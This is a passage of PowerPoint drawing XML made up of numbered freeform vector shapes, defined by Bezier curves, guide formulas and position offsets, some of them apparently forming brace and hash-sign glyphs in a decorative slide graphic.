                      <a:pt x="55" y="223"/>
                      <a:pt x="64" y="223"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64"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Freeform 396"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5985" y="379"/>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4 h 240"/>
                  <a:gd name="T14" fmla="*/ 21 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 119 h 240"/>
                  <a:gd name="T20" fmla="*/ 21 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 41 w 63"/>
                  <a:gd name="T29" fmla="*/ 42 h 240"/>
                  <a:gd name="T30" fmla="*/ 41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1" y="138"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="240"/>
                      <a:pt x="0" y="240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="223"/>
                      <a:pt x="13" y="220"/>
                      <a:pt x="16" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="204"/>
                      <a:pt x="21" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>
                      <a:pt x="28" y="124"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="119"/>
                      <a:pt x="42" y="119"/>
                      <a:pt x="42" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="115"/>
                      <a:pt x="21" y="103"/>
                      <a:pt x="21" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="26"/>
                      <a:pt x="14" y="17"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="0"/>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="82"/>
                      <a:pt x="41" y="82"/>
                      <a:pt x="41" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41"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Freeform 397"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6092"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 name="Freeform 398"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6240"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7"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Freeform 399"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="643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Freeform 400"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6634"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401"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6781"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Freeform 402"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6978"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403"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="712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Freeform 404"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7325"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405"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7473" y="374"/>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1" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="35" y="196"/>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406"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7671"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Freeform 407"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3461" y="36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8"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>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2"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33"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9"/>
                      <a:pt x="154" y="151"/>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1" y="189"/>
                      <a:pt x="121" y="192"/>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4"/>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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>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2"/>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8"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="65" y="182"/>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4" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116"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8"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>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8"/>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8" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>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7" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>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3"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="65" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79"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2" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="72"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408"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3551" y="424"/>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409"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3564" y="42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Freeform 410"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2004"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411"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2152"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412"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="23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413"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2497"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414"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2692"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415"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2890"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Freeform 416"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="1108"/>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2"/>
                      <a:pt x="21" y="102"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="35" y="0"/>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417"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="1108"/>
                <a:ext cx="77"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7 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 64"/>
                  <a:gd name="T15" fmla="*/ 156 h 241"/>
                  <a:gd name="T16" fmla="*/ 43 w 64"/>
                  <a:gd name="T17" fmla="*/ 121 h 241"/>
                  <a:gd name="T18" fmla="*/ 43 w 64"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 45 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 64"/>
                  <a:gd name="T25" fmla="*/ 18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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="212"/>
                      <a:pt x="22" y="205"/>
                      <a:pt x="22" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="156"/>
                      <a:pt x="22" y="156"/>
                      <a:pt x="22" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="136"/>
                      <a:pt x="29" y="125"/>
                      <a:pt x="43" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="116"/>
                      <a:pt x="22" y="104"/>
                      <a:pt x="22" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="27"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="0" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="15"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="102"/>
                      <a:pt x="49" y="112"/>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418"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3248"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420"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3395"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21"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3590"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22"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3788"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23"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3938"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24"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4085"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5"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4284"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6"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4433" y="1103"/>
              <a:ext cx="82"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7"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4581"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8"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4779"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29"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4926"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30"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5125"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1"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5261" y="1108"/>
              <a:ext cx="188" cy="218"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 188 w 188"/>
                <a:gd name="T1" fmla="*/ 67 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 188"/>
                <a:gd name="T3" fmla="*/ 85 h 218"/>
                <a:gd name="T4" fmla="*/ 142 w 188"/>
                <a:gd name="T5" fmla="*/ 85 h 218"/>
                <a:gd name="T6" fmla="*/ 131 w 188"/>
                <a:gd name="T7" fmla="*/ 135 h 218"/>
                <a:gd name="T8" fmla="*/ 177 w 188"/>
                <a:gd name="T9" fmla="*/ 135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5 h 218"/>
                <a:gd name="T32" fmla="*/ 48 w 188"/>
                <a:gd name="T33" fmla="*/ 135 h 218"/>
                <a:gd name="T34" fmla="*/ 58 w 188"/>
                <a:gd name="T35" fmla="*/ 85 h 218"/>
                <a:gd name="T36" fmla="*/ 11 w 188"/>
                <a:gd name="T37" fmla="*/ 85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5 h 218"/>
                <a:gd name="T60" fmla="*/ 78 w 188"/>
                <a:gd name="T61" fmla="*/ 85 h 218"/>
                <a:gd name="T62" fmla="*/ 67 w 188"/>
                <a:gd name="T63" fmla="*/ 135 h 218"/>
                <a:gd name="T64" fmla="*/ 110 w 188"/>
                <a:gd name="T65" fmla="*/ 135 h 218"/>
                <a:gd name="T66" fmla="*/ 121 w 188"/>
                <a:gd name="T67" fmla="*/ 8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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="67"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="121" y="85"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110"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32"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5478"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33"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5904" y="1103"/>
              <a:ext cx="82"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4"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6051"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35"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="62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36"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="639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7"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6547"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38"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6744"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9"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6893"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0"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7043"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1"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7192"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2"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7340"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443"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="753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444"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7686"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445"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5672" y="1096"/>
              <a:ext cx="218" cy="255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 175 w 179"/>
                <a:gd name="T1" fmla="*/ 173 h 209"/>
                <a:gd name="T2" fmla="*/ 134 w 179"/>
                <a:gd name="T3" fmla="*/ 208 h 209"/>
                <a:gd name="T4" fmla="*/ 81 w 179"/>
                <a:gd name="T5" fmla="*/ 198 h 209"/>
                <a:gd name="T6" fmla="*/ 32 w 179"/>
                <a:gd name="T7" fmla="*/ 201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59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3 h 209"/>
                <a:gd name="T40" fmla="*/ 161 w 179"/>
                <a:gd name="T41" fmla="*/ 152 h 209"/>
                <a:gd name="T42" fmla="*/ 88 w 179"/>
